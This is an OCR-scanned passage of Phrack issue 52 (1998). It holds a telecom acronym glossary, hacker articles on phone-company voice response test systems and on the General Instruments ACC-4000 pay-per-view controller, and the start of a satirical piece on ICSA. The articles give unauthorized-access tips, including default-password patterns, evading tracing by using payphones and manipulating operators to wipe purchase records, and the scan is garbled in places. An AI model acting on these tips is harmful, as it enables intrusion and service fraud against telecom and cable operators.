LRD Long Route Design 

LROPP Long Range Outside Plant Plan 
LRT Local Remote Terminal 

LS Loop Start 

LSI Line Side In 

LSO Line Side Out 

LSS Loop Switching System 

LSU sine Switching Unit 

LT Line Terminal 

LTC .xocal Test Cabinet 

LTD xocal Test Desk 

M Mouth 

MC Maintenance Center 

MCC Master Control Center 

MD Manufacture Discontinued 

MDF Main Distributing Frame 


Metallic Distribution Shelf 
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Man Hole 
Metallic Interface Unit, Maintenance Interfac 
Major 


Mechanized Loop Testing 
Material Management 
Minor 

Miscellaneous Pair Panel 
Meter Reading 
Multi-Services Distant Terminal 
Message Telephone Servic 

Majority Vote Error Correction 
Maintenance Work Center 

Maintenance Work Group 

Message Waiting Indication 
Multiplexer Unit 

Network Alarm Bus 

Network Access Interface Unit 

Network Channel Terminating Equipment 
Near End 
Near End Crosstalk 

Network Interface Data Bus 
Network Interface Unit 

New Manhole 

Network Monitoring and Analysis 
Numbering Plan Area 

Network Termination 

Network Terminal Equipment Center 
Non Trouble-Clearing Procedure 
Office Channel Unit 

Office Channel Unit Dataport 
Overhead Controller 

On-hook Transmission 

Optical Interconnect 

Office Interface Unit 

Optical Line Interface Unit 
Operator Number Identification 
Optical Network Unit 

Out Of Service 

Outside Plant Engineer 

Off Premise Station 


E Operations System/Intelligent Network Element 


Office Repeater Bay 

Outside Plant 

Outside Plant Engineer 

Office Timing Unit 

Optical Units 

Order Wire 

Pulse Amplitude Modulation 
Power Amplifier Unit 

Private Branch Exchange 

Pulse Code Modulation 

Power Converter Unit 
Provisioning Display Controller 
Pair Gain 
Pair Group Display 

Pair Group Planning 

Pair Gain System 

Pair Gain Test Controller 
Polyethylene Insulated Conductor 
Plug-in Inventory Control System 
Power Minor 

Present Mode of Operation 

Plain Old Telephone Servic 
Positive Ringing Unit 

Port Test Alarm Bus 

Power Unit 

Printed Wiring Board 

Remove and Reinstall 


Unit 


Wed Apr 26 09:4 


3:42 2017 


RCU Ring Control Unit 

RCVG Receiving 

RDES Remote Data Entry System 

REN Ringer Equivalency Number 

RLS Repeater Location Schematic 

RMU Remote Measurement Unit, Remote Maintenance Unit 
ROS Remote Operations Service 

RPE T Remote Power Feed Terminal 

RSB Repair Service Bureau 

RSM Remote Switching Module 

RT Remote Terminal 

RTS Remote Test System 

RTU Remote Test Unit 

RZ Resistance Zone 

S&E Service and Equipment 

S-E Signal-End 

S/I Signal to Interference 

S/N Signal to Noise 

S1DN Stage One Distributing Network 

S1DP Stage One Distributing Panel 

SAI Serving Area Interface 

SARTS Switched Access Remote Testing System 
SB Signal Battery 

SCG Switching Control Center 

SCCS Switching Control Center System 

SCEC Secondary Channel Error Correction 
SDDF Subscriber Digital Distributing Frame 
SDFI Subscriber Digital Facility Interface 
SDH Synchronous Digital Hierarchy 

SDX Subscriber Digital Crossconnect 

SEFS Severely Errored Framing Second 

SES Severely Errored Seconds 

SF Super Frame 

SFIU Switching Facility Interface Unit 

SG Signal Ground 

SID System IDentification 

SLC Subscriber Loop Carrier 

SLIM Subscriber Line Interface Module 

SM Switching Module 

SMAS Switched Maintenance Access System 
SMU System Memory Unit 

SO Service Order 

SONET Synchronous Optical Network 

SP Standard Power, Special Protection 
SPGM Suburban Pair Gain Planning 

SPGPM Suburban Pair Gain Planning Method 
SPOTS Special Plain Old T phone Servic 
SPR Superimposed Ringing 

SPTS Signaling Path Test Set 

SSC Special Service Center 

SSP Special Service Protection 

SSU Special Service Unit 

STIU Switching Transmission Interface Unit 
STM Span Terminating Module 

STS Synchronous Transport Signal 

SXS Step-by-Step 

SYSCTL System Controller 

-BRITE T-Basic Rate Interface Transmission Extension 
TAD Trouble Analysis Data 

TAP Trouble Analysis Procedure 

TASC Telecommunications Alarm Surveillance Control System 
TASX Telecommunications Alarm Surveillance and Control System 
TAU Time Assignment Unit 

TBCU Test Bus Control Unit 

TBOS Telemetry Byte-Oriented Serial 

TCU TransCoder Unit 

TD Toll Diversion 

TDM Tandem 
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TFD Trunk Distributing Frame 
TFIU Transmission Facility Interface Unit 
TGS Synchronous Timing Generator 
THC Test Head Controller 
TIRKS Trunk Inventory and Record Keeping System 
TLWS Trunk Line Work Station 
TMC Time slot Management Channel 
[TMT Transmission Maintenance Terminal 
TNO The New Order 
TNOP Total Network Operating Plan 
TO Transmission Only 
TOC Task Oriented Costing 
TOP Task Oriented Procedure 
TPI Tip Party Identification 
TRMTG Transmitting 
TRU Transmit/Receive Unit 
TSI Time Slot Interchange 
TSU Transmission Signaling Unit 
UAS UnAvailable Second 
UIP User Interface Panel 
UL Underwriters Laboratory 
UNICCAP Universal Cable Circuit Analysis Program 
USDL U-interface Digital Subscriber Line 
VF Voice Frequency 
VRT Virtual Remote Terminal 
VT Virtual Tributary 
VTU Virtual Tributary Unit 
WATS Wide Area Telephone Servic 
WC Wire Center 
WCPC Wire Center Planning Center 
WES Warranty Eligibility System 
WORD Work Order Record Details 
XADU eXtended Alarm Display Unit 
XTC eXtended Test Controller 
ZCS Zero Code Suppression 
SLC Vendors 
AT&T 
12450 Fair Lakes Cir 
Ste 302 
Fairfax, VA 22033 


Ph 
Fa 


one: (703) 802-3853 
x: (703) 802-3853 


SLC-5 SLC-2000 
Maximum No. Subscriber Ports 192 768 
Remote Terminal (qty. per 7-ft. size) 3 1 
Remote Inventory and Diagnostics Y ¥: 
Identical Plug-ins for RT and COT Y ¥ 
Max. DS1 Span Lines Supported 24 28 
Max. DS1 Span Lines Powered/Protected 24 28 
Integrated DS-3 Interfac N N 
Integrated Sonet Interfac OC-3 
TR-008 Compatible Mode Y Y 
TR-303 Compatible Mode Y Y 


Fu 
28 


jitsu Network Communications Inc 
O01 Telecom Parkway 
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Richardson, TX 75082 
Phone: (800) 777-3278 
Fax: (214) 479-6990 


17 


FDLC 


Maximum No. Subscriber Ports 
Remote Terminal (qty. per 7-ft. 
Remote Inventory and Diagnostics 
Identical Plug-ins for RT and COT 
Max. DS1 Span Lines Supported 
Max. DS1 Span 
Integrated DS-3 Interfac 
Integrated Sonet Interfac 
TR-008 Compatible Mode 
TR-303 Compatible Mode 


size) 


Lines Powered/Protected 


bh 
Ne} 
i) 


ZK AZABZACOKK SS 


NEC America Inc 

14040 Park Center Rd 
Herndon, VA 22071 
P 
F 


hone: (703) 834-4000 


ax: (703) 834-4306 


ISC-303 


Maximum No. Subscriber Ports 
Remote Terminal (qty. per 7-ft. 
Remote Inventory and Diagnostics 
Identical Plug-ins for RT and COT 
Max. DS1 Span Lines Supported 
Max. DS1 Span 
Integrated DS-3 Interfac 
Integrated Sonet Interfac 
TR-008 Compatible Mode 
TR-303 Compatible Mode 


size) 


Lines Powered/Protected 


KOK 


Northern Telecom, Inc. 
Northern Telecom Limited 
8220 Dixie Road 

Suite 100 

Brampton, Ontario 

L6T 5P6 Canada 

Phone: (905) 863-0000 


Phone: (800) 4-NORTEL 


DMS-1 Urban 


Access Node 


Maximum No. Subscriber Ports 
Remote Terminal (qty. per 7-ft. 
Remote Inventory and Diagnostics 
Identical Plug-ins for RT and COT 
Max. DS1 Span Lines Supported 
Max. DS1 Span 
Integrated DS-3 Interfac 
Integrated Sonet Interfac 
TR-008 Compatible Mode 
TR-303 Compatible Mode 


size) 


Lines Powered/Protected 


Oo 
ws 
ws 


AK BZAwWDoKKO 


672 


KKK KODKK 
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RELTEC Corp 

5875 Landerbrook Dr 
Cleveland, OH 44124 
P 
F 


hone: (216) 460-3600 


ax: (216) 460-3690 


18 


DISCS 1 


Sonet DISCS 


DISCS FITL 


Maximum No. Subscriber Ports 
Remote Terminal (qty. per 7-ft. 
Remote Inventory and Diagnostics 
Identical Plug-ins for RT and COT 
Max. DS1 Span Lines Supported 

Max. DS1 Span Lines Powered/Protected 
Integrated DS-3 Interfac 

Integrated Sonet Interfac 

TR-008 Compatible Mode 

TR-303 Compatible Mode 


size) 


672 
672 


KK AAZAODKK 


2016 
672 


KKK ZORKK 


KKK ZORKKNO 


Siescor Technologies, 
Box 470580 

Tulsa, OK 74147-0580 
Phone: (918) 252-1578 
Fax: (918) 252-2757 
E-Mail: seiscor@raytheon.com 


Tne. 


(A division of Raytheon) 


FiberTrag 


S-24DU 


RLC-1920 


Maximum No. Subscriber Ports 
Remote Terminal (qty. per 7-ft. 
Remote Inventory and Diagnostics 
Identical Plug-ins for RT and COT 
Max. DS1 Span Lines Supported 

Max. DS1 Span Lines Powered/Protected 
Integrated DS-3 Interfac 

Integrated Sonet Interfac 

TR-008 Compatible Mode 

TR-303 Compatible Mode 


size) 


1920 


----[ EOF 
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[ Voice Response Systems 
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+ Part I + 


Overview 


A VRS (Voice Response System) is a computer system that is called using 
a normal DTMF (Dual-Tone Multi-Frequency) telephone and interacted with 
by speaking or by pressing buttons on the telephone keypad. 


This article will discuss three such systems which are used by LLC Local 
Loop Carriers (LLCs) to maintain the Public Switched Telephone Network 
(PSTN). The systems ar 


DATU 
SOLTS 
FAST 


+ Part II + 


+ DATU LC/RT Loop Conditioning System + 


ae Introduction 
Tl. Features 
III. Usage 

TVs Part Numbers 
Introduction 


The Harris Corporation’s DATU Loop Conditioning System combines a full 
range of advanced features with unmatched versatility to help maximize 
field testing and conditioning capabilities. The DATU system extends the 
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field technicians testing capabilities of subscriber lines through the 
non-metallic environment of a pair gain system. 


DATU is a printed wiring card that employs micro-processor control of 
test functions and provides voice prompting. The card is installed in 
the Metallic Facility Terminal (MFT) frame and connected through a 
No-Test trunk to a switching facility. It may be used with most types of 
Central Offices (CO) including SXS, Crossbar, ESS and DMS. 


The DATU system can include the Pair Gain Applique (PGA) II, located 
with the DATU system at the CO, and the Metallic Access Unit (MAU), 
which is mounted within a remote terminal. 


PGA units allow testing of subscriber lines being served through an 
SLC-96 pair gain system. The PGA provides an interface between the DATU 
and a Pair Gain Control Unit. The DATU will transmit tones to assist in 
determining the status of the carrier channel. When a subscriber line is 
being served by a pair-gain-system and the DATU is used to test it, a 
warble tone is heard. The warble tone is followed by either a single 
one-second tone, two one-second tones, or three one-second tones. This 
indicates either a single party channel, multi party channel or a coin 
channel. The absence of a tone indicates trouble with the channel or 
channel equipment. 


Features 


AUDIO MONITOR - The subscriber line may be monitored for up to 10 
minutes, after which time the DATU disconnects from the No-Test trunk. 
Audio Monitor may be used on either busy or idle lines. Traffic on a 
busy line will be audible but unintelligible. The Audio Monitor Mode may 
b xited before th nd of the 10 minute period by selecting an 
appropriate test function. 


OPEN LINE - Opens subscriber line by removing battery and ground. 


= 


SHORT LINE - A metallic short is placed across the tip and ring of the 
subscriber line. 


SHORT TO GROUND - A metallic connection between tip, ring, and ground. 
This feature is not available on a busy line. 


IP TO GROUND - A metallic connection between tip and ground with the 
ring open. 


RING TO GROUND - A metallic connection between ring and ground with the 
tip open. 


HIGH LEVEL TEST TONE - A high level 577Hz metallic-tracing tone, 
interrupted four times per second, for identity purposes. The High Level 
Test Tone is not available on a busy line. 


HIGH LEVEL TONE ON TIP - Test tone is placed only on the tip side of the 
line, with the ring side grounded. 


HIGH LEVEL TONE ON RING - Test tone is placed only on the ring side of 
the line, with the tip side grounded. 


LOW LEVEL TEST TONE - A low level 577Hz simplex-tracing tone, 
interrupted four times per second, for identity purposes. The Low Level 
Test Tone may be applied even if the line under test is busy, and it 
will not disturb traffic on that line. Note that on some No.5 ESS 
switches, Simplex tone may not transmit. 


SINGLE LINE ACCESS - Allows conditioning functions on the same line used 
to access the DATU system. 
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HOLD —- Used to continue a line preparation function after disconnecting 


from the system’s access line. 


FORCED DISCONNECT - Allows the technician to disconnect from the system 


at any time by dialing ##. 
ADMINISTRATIVE - Password protection for both user and administrator 
modes of access. System usage counters and timers are accessible through 
interactive voice respons 
DATU Usage 
Dial DATU Number. 
Dial User Security Code. 
Dial 7 Digit Subscriber Number. 
/ \ 
/ \ 
/ \ 
/ \ 
/ \ 
/ \ 
| 
Normal Subscriber Line SLC Subscriber Line 
OK 8 second warble 
-then- 
60 IPM busy: Pair Gain Test Controller 
=ore 
120 IPM Busy: Busy test pair 
Sore 
1 second tone: One party line 
-~or- 
2 second tone: Two party line 
-~or- 
3 second tone: Pay phone 
-~or- 
No tone: Bad carrier channel 
| 
\ / 
\ / 
\ / 
\ / 
\ / 
\ / 


Enter DATU funct 


enu 
Audio Monitor 


ion code for condition: 


Short 


[Tip and Ring to Ground 


High Level 


Coil 


ing Tone 


iow Level 


Simp] 


HNO BWNE 


Harris DATU Part Numbers 


Loop Conditioning System 


DATU-RT Loop Conditioning System 


TSA 


ex Tone 


Short Tip to Ring 
Continue test after disconnect 
Enter new seven digit subscriber number 


Gite 


P/N 24820-0011 
P/N 24810-002 
P/N 24820-003 
P/N 24800-103 


minute, 


Alarm 


0=10 minutes) 
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DATU-RT (GID-5 Version) P/N 24820-005 
TDC P/N 24800-102 
Metallic Access Unit P/N 24840-002 
MFT Card File P/N 25460-002 
Metallic Access Unit (RSU version) P/N 24845-005 
+ PART III + 


+ Small Office Loop Testing System + 


+ (SOLTS) + 


Small Office Loop Testing System (SOLTS) is a system used by telephone 
company field repair personnel to test a phone line from any touch-tone 
telephone. 

When dialing a SOLTS number, the first prompt is: 


“Please enter ID, terminate with #7 


SOLTS allows 30 seconds to enter a correct ID, then prompts: 


“Pleas nter line number and press #7 


SOLTS allows 60 seconds to enter a line number, then prompts: 
“Select mode, for help enter 07 


SOLTS allows 60 seconds to choose one of six options: 


Enter: 

1) Interactive Testing 
2) Calling on test line 
3) Retrieve results 

8) Hang up 

9) Enter line number 

0) Help 


Option one allows testing the telephone line connected to the number 
entered in step two above. Option two tests the line the technician is 
calling from. Option three is used to retrieve the results generated 
using options one and two. Option eight disconnects from the system. 
Option nine allows a new line number to be entered for testing. Option 
zero accesses on-line help. 


#) Line test 

1) Fault Location 
2) Special tests 
3) Completion Test 
8) Hang up 

9) Enter line number 
0) Help 
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Line Test 


Perform a line test on the number entered, then: 


7) Repeat Results 

8) Hang up 

9) Enter line number 
0) Help 


Fault Location 


Performs initial line test on the number entered, then: 


2) Next step 

7) Repeat results 

8) Hang up 

9) Enter line number 
0) Help 


Special Tests 


Performs initial line test on the number entered, then: 


Repeat line test 
Loop and Ground 
Pull dial tone 
Pair ID Tone 
Repeat results 
Hang up 

Enter line number 
Help 


OO OA WWD FH 


Completion 


Performs a line test on the number entered, records the results, 
then requests: 


Repeat results 
Hang up 

Enter line number 
Help 


Mode 2 -- Calling On Test Line 


#) Line Test 

3) Completion Test 
8) Hang up 
9) 
0) 


Enter line number 
Help 


Performs a line test on the number entered, if line is busy 
requests Craft to hang up, performs a line test and stores the 
results. 


8) Hang up 
9) Enter line number 
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0) Help 


Completion 


Performs a line test on the number entered, if line is busy 
requests Craft to hang up, performs a line test, and records the 


results. 
8) Hang up 
9) Enter line number 
0) Help 
Mode 3 Retrieve Results 


States the stored results for the line number entered, then: 


7) Repeat results 

8) Hang up 

9) Enter line number 
0) Help 


a PART IV + 


+ Field Access Service Tool + 


+ (F.A.S.T.) + 


When calling FAST, the first prompt is a request for a security code. 
The security code is usually th mploy badge number. After the 
security code is entered and the # key is pressed, FAST will prompt for 
the password. The password is usually 4-7 digits long and usually 
expires every 30 days. The default password is usually the security 
code. After the password is entered and the # key is pressed the FAST 
New Notices and Features are played. 


After all of that, the FAST Main Menu is made available: 
FAST Main Menu 


Facilities Inquiry 

MLT Test 

Cut to new facilities 

Change Status of a cable and pair 
Test Caller-ID 

Close a Service Order 
Cable transfer (for splicers) 
Administrative 

News and documentation 
Connect call to Help Line 


CO WMAATA URWNE 


1: LFACS Inquiry 
1. by phone number 
2. by cable pair 


Enter telephone number 
1. Correct 
2. Re-enter 
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1. Current assignment 
2. Spare pairs 
3. Multiple appearances 
1. Fl (feeder) 
2. F2 (distribution) 
3. F3 (if any) 
4. All facilities in loop 
2: Enter wire center NXX 
1. Correct 
2. Re-enter 
Enter cable number 
1. Correct 
2. Re-enter 
Enter pair count 
1. Correct 
2. Re-enter 
1. Current status 
2. Spare pairs 
3. Multiple appearances 
4. Defective pair list 
5. Another cable-pair 
6. Another pair, same cable 
2 MLT test 
1. Quick 
2. Loop 
3. Full 
4. Add tone 
5. Remove tone 
Tone: Enter telephone number 


1. Correct 
2. Re-enter 


Add tone - enter number of minutes of tone # 
1. Another request 


2. End call 
3. Wait for tone 


33 Cut to new facilities 
1. Service Order 
2. Trouble Ticket 


pe Service Order 
1. C-Order 
2. N-Order 
3. T-Order 
4. Other 


Enter 6 digit numeric portion of order number 
Correct 
2. Re-enter 


Go to "Hear Fl assignment" below. 


2: Trouble Ticket 
Enter telephone number 
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1. Correct 
2. Re-enter 


Hear Fl assignment 
1. Cut 
2. Keep 


Hear F2 assignment 
Le Cat 
2. Keep 


Hear F3 assignment 
do CUE 
2. Keep 


Go to "Specify code for bad pair" below. 


4: Change status of a cable/pair to defective or non-defective 


Specify code for bad pair 
GTP 

OPN 

OTP 

UBL 

SHT 

GRG 

CBY 

Other 


DADO PWNE 


1. Non-defective 

2. Defective, unknown 
3. Exposed 

4. Split pair 

5. Previous list 


Specify pair to use 


nter new cable number or only # if no change 
Correct 
Re-enter 


Nr 


nter new pair number 
Correct 
Re-enter 


Nr 


FAST pages the technician to indicate the success 
of the cut. 


Note: If Fl is being cut both LFACS and COSMOS need 
updates. Two pager messages will be sent. 


If CF pair is used as spare, information will be 
given to break connection. 


5: Test Caller-ID 

Enter 7 digit telephone number to be called. 
1. Correct 

2. Re-enter 

3. Correct and calling from the number 


6: Close Service Order 
1. C-Order 
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2. N-Order 
3. T-Order 
4. Other 
Enter 6 digit numeric portion of order number 
1. Correct 
2. Re-enter 
1. Closed today 
2. Closed yesterday 
3. Other 


Cable transfer 

Enter TN from cut sheet 
1. Correct EWO.xfer 

2. Re-enter TN 


Enter first item number 
Enter last item number 
1. Correct 

2. Re-enter 


To transfer this item: 
1. Move to new equipment 
2. Skip this item 


Administrative 

1. Change Password 

2. Change 3 digit EC 
3. Change 3 digit NPA 


FAST News 


FAST Help Line 


When entering a variable number of digits, # is required to end 


When entering a fixed number of digits, # is not required. 
Pressing 9 will always return to the main menu. 


To enter alpha characters press * to enter alpha mode and then 


use the following key sequences. Use * again to exit alpha mode. 


For example: Voy866 would be *836393%*866. 
A 21 
B 21 
Cc 23 
D 31 
E 32 
F 33 
G 41 
H 42 
I 43 
J SL 
K 52 
L 53 
M 61 
N 62 
O 63 
P 71 
Q 01 
R 73 
Ss 3 


ntry. 
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81 
82 
83 
91 
92 
93 
03 
11 
" 12 
+ 13 


NKxMS<SCH 


te Part V + 


+ Conclusion + 


Voice Response Systems can be a great deal of fun, and they can be 
safely accessed from a public telephone. Don’t play with these from 
home. VRSS are a great way to hack without using a computer. 


For information on the Teradyne 4Tel VRS System, read the LOD/H 
Technical Journal, Issue #3: File 05 of 11: An Overview of the Teradyne 
4Tel System by Doom Prophet LOD/H. 


----[ EOF 


13.txt Wed Apr 26 09:43:42 2017 1 
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 13 of 20 


[ Pay Per View (you don’t have to) 


-------- [ Cavalier[TNO] 
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| Introduction | 


N , 


General Instruments sells more cable television equipment than any other 
manufacturer. Included in their product range is the ACC-4000. The 
ACC-4000 is a system that controls Pay-Per-View television. 


The ACC-4000 is a PC running SCO Open Desktop v3.0. Earlier ACC-4000s 
ran Interactive Unix. The interface for the ACC-4000 is X-Windows based, 
so you can hack your way to free pron through an attractive GUI. 


The ACC-4000 is often referred to as an addressable system. This means 
that each set-top-box can be addressed independently. This allows every 
subscriber to select their own programming -- and it allows the cable 
television company to bill the subscriber for every television show the 
subscriber selects. 


The cable television signal is normally sent by satellite to a cable 
headend. To translate this into terms that may be more comfortable to 
Phrack readers, the cable head end is similar to a telephone company 
central office. At the headend, the signal is scrambled to make it more 
difficult to view without paying. 


The ACC-4000 then routes the signal from the headend to the appropriate 
set-top-boxes. It does this by merging control information into the data 
stream before the data stream reaches the set-top-boxes. The ACC-4000 
can talk to one-way, FONE-way, and two-way set-top-boxes. The ACC-4000 
works over standard RF cable, fiber optics, microwave, and even 
telephone wiring. 


The ACC-4000 is capable of sending billing information to a cable 
television billing system, such as CableData, CSG, or Wizard. 


The ACC-4000 is a small system. The unit I examined was using a 486DX-50 
processor. Nevertheless, one ACC-4000 can manage a half a million set 
top boxes. 


Often you will find other General Instruments systems connected to the 
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ACC-4000. A Data Provider Translator system can take input from outside 
sources and merge them into the data stream going to the set-top-boxes. 
This provides features like program guides, VCR IR codes, weather data, 
Near-Video-On-Demand (NVOD) schedules, or even custom logos and menus. A 
Message Editor system can be used to create custom "barker" messages for 
cable subscribers. 


| Automatic Windows 


4% , 


In addition to the login window, the ACC-4000 opens two other types of 
windows automatically to display information on the console. Using 
Xwatchwin to view these windows remotely can help you figure out what is 
going on with the system. The Windows are: 


Logger Window 
Wire Link X 


The window titled "Logger Window" contains status and error messages. 


The windows titled "Wire Link X" show data going from the ACC-4000 out 
to other systems, usually the billing system. There is one "Wire Link X" 
window for each system the ACC-4000 is feeding data. 


| The Login Window | 


% , 


The login window is extremely informative and looks something like this: 


ACC4000 Help 


LOGIN | Login to ACC4000 | 


General Instruments Addressable Control System 


User Name: ####HFEEEEEEFEEE EEE EE EE HE HEH Password: #####t## 
COPYRIGHT (C) 1996. General Instrument Corporation 


Site Number: 866 Geocode: 303 Terminal: tno:0.0 Software Version: V8.66 


Number ANICS Installed: 1 Number of Subscriptions: 16 
Parallel Data Streams: 1 lst Subscription Service Code: 1 

List Maintenance: HOST Number of Simultaneous Events: 48 

Number List Maps: 8 lst Event Service Code: 89 

Return Frequency: 08.9 Mhz Data Stream Baud Rate: 13.97 Khz 
Data Base Size: 288K Subscribers Converter ID Usage: 32K Groups 
lst group l-way 2nd group phone 3rd group phone 4th group 2-way 
5th group 2-way 6th group 2-way 7th group 2-way 8th group 2-way 


9th group 2-way 


Enter operator name 


F6:Clear Field F7:Field Help F8:Form Help 


Site Number is assigned by General Instruments. This number is 
also stored in the set-top-box. 


Geocode is a optional number that may be assigned by the cable 
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television company to segment it’s set-top-boxes into groups. 


Terminal is the name of the X-windows terminal you are 
connecting from. 


Software Version is the release number of the ACC-4000 software. 


Number ANICS Installed is the number of transmission devices 
installed. 


Parallel Data Streams is the number of simultaneous 
transmissions into the data stream. 


List Maintenance is always set to HOST. In the future, General 
Instruments plans to allow the an ANIC to maintain the list of 
authorizations. 


Number List Maps is the size of the queue between the ACC-4000 
and the ANIC. 


Number of Subscriptions is the number of service codes allotted 
for subscriptions. 


lst Subscription Service Code is the first available scrambler 
tag for descrambling subscriptions. 


Number of Simultaneous Events is the maximum number of 
Simultaneous Pay-Per-View (PPV) events that can be available at 
one time. 


lst Event Service Code is the first available scrambling tag for 
Pay-Per-View PPV events. 


Return Frequency is the transmit frequency used by two-way set 
top boxes. The range is normally 8.3 - 10.4Mhz. 


Data Stream Baud Rate is the rate of transmission of the data 
stream. 


Data Base Size is the maximum number of set-top-boxes the system 
is configured for. 


Converter ID Usage is always set to 32k. This means that 32k 
set-top-boxes can be grouped into a partition. 


Groups shows the division of the total number of set-—top-boxes 
(data base size) into partitions. 


| The Main Menu | 


‘ 


, 


The Main Menu is the gateway to all other menus and looks something like 


this: 
MAINMENU | Main Menu of Screen Options |records found 
Main Menu of Screen Options 
1. Converters Convs 7. User Information Users 
2. Services/Schedules Svcs 8. Control System Functions System 
3. Headend Equipment Headend 9. Reports Reports 
4. Converter Types ConvTyp 10. Data Path Configuration DataCfg 
5. Data Files Files 11. Message Management MsgMgt 
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| 
| 
| 
| Enter Selection: 
| 
‘N 


6. Business System Gateway Gateway 


4 


12. Return to Login 


Exit 


F6:Clear Field 


Enter selection number or press function button 


F7:Field Help 


F8:Form Help 


| Other Menus | 


‘N , 


The ACC-4000 has many other menus that are accessed through the Main Menu. 


I will not waste time and space here describing these menus. 


If you gain 


access to an ACC-4000, the online help should be sufficient to aid you 


in using the system. 


These menus allow you to perform functions such as: 


Managing set-—top-boxes 


Managing headend scramblers 
Sending messages to subscribers 


Performing opinion polls on subscribers 
Configuring availabl 
Managing purchase data 


Pay-Per-View 


Maintaining the ACC-4000 database 


Creating reports 


Converter Types | 


N , 


The ACC-4000 system supports a large number of set-top-boxes: 


events 


Type Model Partition Type 
1 DRZ RCOM II, 400, One-Way 
(PROM based) 
Z DRZA-*A, DRZP-*A RCOM 450 One-Way 
(PROM based, 128 tags) RCOM 450/P3 
3 DRZI*-*A RCOM 450/P3 One-Way 
(PROM based, 256 tags) 
4 DRZI*-AT RCOM 450 Two-Way 
ip) xTRo— tales RCOM V One-Way 
6 XTE5-*2% RCOM V Two-Way 
7 DRZI*-*AV RCOM 450 One-Way 
8 DP*5=*3* RCOM VI+ Fone-Way 
9 DL4/DL4A RCOM V One-Way 
10 DP*5=* Lx RCOM VI+ One-Way 
11 DP*5=*:2* RCOM VI+ Two-Way 
T2 DPBB-*1* RCOM VI+ One-Way 
13 DPBB-*3* RCOM VI+ FONE-Way 
14 DPBB-*2* RCOM VI+ Two-Way 
15 DP711*, DPV721*, DPV721*/C1 RCOM 7100/7200 One-Way 
16 DP713*, DPV723*, DPV723*/C1 RCOM 7100/7200 FONE-Way 
17 DP712*, DPV722*, DPV722*/C1 RCOM 7100/7200 Two-Way 
18 DPBB7-*1* RCOM 7300 One-Way 
19 DPBB7-*3* RCOM 7300 FONE-Way 
20 DPBB7-*2* RCOM 7300 Two-Way 
21 DPBB-*1*-M1 RCOM VI+ M/S One-Way 
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22 DPBB-*3*-M1 STARCOM VI+ M/S FONE-Way 
23 DPBB-*2*-M1 STARCOM VI+ M/S Two-Way 
24 IDP7, LMDS-A, MMDS-A/CT1900 IDP7, LMDS-A, MMDS-A/CT1900 One-Way 
25 IDP7, LMDS-A, MMDS-A/CT1900 IDP7, LMDS-A, MMDS-A/CT1900 FONE-Way 
26 IDP7, LMDS-A, MMDS-A/CT1900 IDP7, LMDS-A, MMDS-A/CT1900 Two-Way 
27 DCR DCR One-Way 
28 DCR 3000S/4000S DCR One-Way 
30 CFT2000/2100 CFT2000/2100 One-Way 
31 CFT2000/2100 CFT2000/2100 FONE-Way 
32 CFT2000/2100 CFT2000/2100 Two-Way 
33 STARPOR STARPOR One-Way 
34 STARPORT (not implemented) STARPORT FONE-Way 
35 STARPORT (not implemented) STARPORT Two-Way 
36 CFT2200 CFT2200 One-Way 
37 CFT2200 CFT2200 STARFONE FONE-Way 
38 CFT2200 CFT2200 STARVUE Two-Way 
39 CFT2900 CFT2900 One-Way 
40 CFT2900 CFT2900 FONE-Way 
41 CFT2900 CFT2900 Two-Way 
42 Sega Sega One-Way 


| Scrambler Types | 


N , 


The ACC-4000 system supports several different types of scramblers at the 
headend, including: 


STARPACK Service Encoder (SSE) 


An older scrambler that scrambles with standby and 6db constant 
sync-suppression scrambling modes. 


GJ 


Digital Scrambler/Encoder (DS/E) 
An older RF scrambler. 


Digital Video/Encoder (DV/E) 


An older baseband scrambler, used to further scramble DS/E 
signals. 


Video Processor/Encoder (VP/E) 


A DS/! 


|| 


and a DV/E together. 

Modulating Video Processor (MVP) and MVPII 
A newer scrambler. 

Modulating Video Processor (MVP) II-DIU 


A MVPII with a Data Inserter Module (DIM) to enable data insertion. 


| Scrambling Modes | 


N , 


The ACC-4000 controls scramblers using several modes of scrambling, including: 


Sync Suppression 
Video Inversion 
Audio Inversion 


Supported sync suppression submodes are: 
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Standby 

Clear, Odb constant 

6db constant 

10db constant 

Scene change, 3 seconds 

6/10 pseudo-random, 30 seconds 
6/10 pseudo-random, 1 minute 
6/10 pseudo-random, 16 tics 
6/10 pseudo-random, 3 seconds 


When using scene change or 6/10 pseudo-random sync suppression, the 
ACC-4000 supports a number of dynamic mode types: 


Pseudo-random 6/10/clear 
Pseudo-random 6/clear 
Pseudo-random 10/clear 
Pseudo-random 6/10 
Linear 6/10/clear 

Linear 6/clear 

Linear 10/clear 

Linear 6/10 


In addition, you can set the interval between dynamic mode time changes 
in hours, minutes, seconds, or tics. 


Supported video inversion submodes are: 


Clear 

Scene change field inversion 
Constant video inversion 
Timed field inversion 


Note: Video and audio inversion only work with baseband set-top-boxes. 


| Security Notes | 
, 


ay 


These systems normally have modems for use by both General Instruments 
personnel and cable company personnel. General Instruments personnel 
dial in to diagnose problems with the system. Cable company personnel 
dial in to change Pay-Per-View (PPV) programming or to configure 
customer set-—top-—boxes. 


Any uncollected purchases are lost when a set-top-box is initialized. 
To preserve uncollected purchases, the operator will do a Refresh 
instead of an Initialize. If you can talk the operator into doing an 
Initialization instead of a Refresh, any uncollected purchases not 
already forwarded to the billing system will be lost. 


Purchases are stored as integers. Older set-top-boxes were limited to 
storing 16 purchases. Newer set-top-boxes are limited to storing 63 
purchases. 


If you can access a system such as the ACC-4000, you can have great fun. 
Be careful when giving everyone in your city free access to WWF. 


----[ EOF 
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[ The International Crime Syndicate Association 


a ot la [ Dorathea Demming 


, ICSA = 
= International Computer Security Association = 


= International Crime Syndicate Association? = 


= by = 


= Dorathea Demming = 


= (c) Dorathea Demming, October, 1997 = 


This is an article about computer criminals. I’m not talking about the fun 
loving kids of the Farmers of Doom [FOD], the cool pranksters of the Legion of 
Doom [LOD], or even the black-tie techno terrorists of The New Order [TNO]. 
I’m talking about professional computer criminals. I’m talking about the 
types of folks that go to work every day and make a living by ripping off 
guileless corporations. I’m talking about the International Computer Security 
Association [ICSA]. The ICSA has made more money off of computer fraud than 
the other thr organizations mentioned above combined. 


ICSA was previously known as National Computer Security Association [NCSA]. 
It seems that they finally discovered that there are networks and gullible 
corporations in countries other than the United States. 


In this article I will inform you of the cluelessness and greed of ICSA. 
Instead of telling you, I will let them tell you in their own words. 


Lets look at what the NSCA has to say about it’s history: 


"the company was founded in 1989 to provide independent and 
objective services to a rapidly growing and often confusing 
digital security marketplace through a market-driven, for-profit 
consortium model." 


